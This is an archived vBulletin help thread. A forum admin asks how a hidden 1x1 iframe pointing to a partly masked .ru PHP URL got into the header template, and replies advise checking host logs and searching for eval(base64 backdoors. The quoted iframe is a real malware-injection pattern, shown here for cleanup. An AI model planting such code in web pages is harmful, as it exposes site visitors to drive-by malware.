The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
help with unauthorized entries on my forum - badware
Need some help from you guyz....
Today when browsing my forum website i got a warning from google telling i had some badware code somewhere. After checking google webmaster tools, they said i had this code somewhere on my website: Code:
<iframe width=1 height=1 frameborder=0 src=http://www.**-***.ru/vb/legacy/phra.php></iframe> After making a search on my templates, saw this code was entered in my header template !!! Removed immediately but now would like to investigate how someone could have gain access to my templates and my board as i am the only admin accessing the boards. AdminCP logs says no access from third parties. Where can i check other unauthorized entries? If posting in wrong section, please forward Thank you ! |
#2
|
|||
|
|||
check logs with host
|
#3
|
||||
|
||||
Sounds like you have a php fie that could have added some Eval(base64 code, you will need to search all your files for eval(base64 or even just base64 to be able to remove the lines or just overwrite the core vbulletin files (if you haven't modified them) with new ones via ftp in ASCii mode, but unless you find the php file (not one of vbulletins) thats causing it it's going to come back!
You can check vbulletins files using the diagnostics in admincp>maintainance>diagnostics>suspect file versions run this and if vbulletin finds code that doesn't belong there it will flag the file up to you, but remember it will not show you which 3rd party php file is causing the issue. Also check here https://www.vbulletin.com/forum/show...ms-More-Secure for tips in preventing it in the future. |
Благодарность от: | ||
blind-eddie |
Thread Tools | |
Display Modes | |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|